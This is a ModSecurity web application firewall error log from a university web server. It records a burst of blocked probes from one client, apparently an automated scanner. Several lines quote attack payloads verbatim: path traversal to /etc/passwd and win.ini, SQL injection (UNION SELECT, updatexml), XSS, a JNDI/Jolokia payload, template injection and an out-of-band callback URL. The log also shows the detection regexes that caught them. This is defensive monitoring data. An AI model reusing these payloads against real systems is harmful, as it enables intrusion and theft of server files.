[Tue Aug 29 11:44:32.417011 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAfkzBUAAAAi"]
[Tue Aug 29 11:44:35.393189 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gt47y8g7bic63o.oast.site found within TX:1: cjmnbitjmimt14dgn26gt47y8g7bic63o.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAg8a7IAAAAK"]
[Tue Aug 29 11:44:35.435500 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAe3@D8AAAAA"]
[Tue Aug 29 11:44:43.782532 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAhISNkAAAAH"]
[Tue Aug 29 11:44:44.525453 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfVkecAAAAD"]
[Tue Aug 29 11:44:47.365409 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAdxUh4AAAAC"]
[Tue Aug 29 11:44:47.775991 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAdOefEAAAAS"]
[Tue Aug 29 11:44:48.418636 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAc4E0kAAAAP"]
[Tue Aug 29 11:44:48.452777 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAdOefMAAAAS"]
[Tue Aug 29 11:44:51.504911 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAfcoVcAAAAa"]
[Tue Aug 29 11:44:53.366214 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13xcCo-f0AAAfEBzoAAAAO"]
[Tue Aug 29 11:44:53.536557 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAe3@HgAAAAA"]
[Tue Aug 29 11:44:54.485747 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13xsCo-f0AAAhISPwAAAAH"]
[Tue Aug 29 11:44:55.519728 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13x8Co-f0AAAfEB0sAAAAO"]
[Tue Aug 29 11:44:56.658527 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfSWhUAAAAB"]
[Tue Aug 29 11:45:00.889855 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAh5RVgAAAA3"]
[Tue Aug 29 11:45:02.424990 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhtjbgAAAAq"]
[Tue Aug 29 11:45:05.347843 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAh0rUAAAAAy"]
[Tue Aug 29 11:45:05.387064 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAfGahUAAAAT"]
[Tue Aug 29 11:45:06.363853 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAh4DXMAAAA2"]
[Tue Aug 29 11:45:06.391830 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130sCo-f0AAAhISRgAAAAH"]
[Tue Aug 29 11:45:07.367145 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAhxwlMAAAAv"]
[Tue Aug 29 11:45:07.367787 2023] [:error] [pid 2166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO1308Co-f0AAAh2H2sAAAA0"]
[Tue Aug 29 11:45:07.383489 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1308Co-f0AAAhISRkAAAAH"]
[Tue Aug 29 11:45:10.407885 2023] [:error] [pid 2166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh2H3EAAAA0"]
[Tue Aug 29 11:45:11.366912 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAhZRdUAAAAG"]
[Tue Aug 29 11:45:12.394990 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAfbkwEAAAAZ"]
[Tue Aug 29 11:45:13.402954 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAhgoGoAAAAb"]
[Tue Aug 29 11:45:15.377486 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhZRdwAAAAG"]
[Tue Aug 29 11:45:16.411803 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAh7wtYAAAA5"]
[Tue Aug 29 11:45:17.400004 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhab98AAAAW"]
[Tue Aug 29 11:45:17.412664 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAh13vYAAAAz"]
[Tue Aug 29 11:45:19.375474 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhvjWcAAAAs"]
[Tue Aug 29 11:45:20.419211 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAfbkw0AAAAZ"]
[Tue Aug 29 11:45:22.377642 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO134sCo-f0AAAhpwQMAAAAm"]
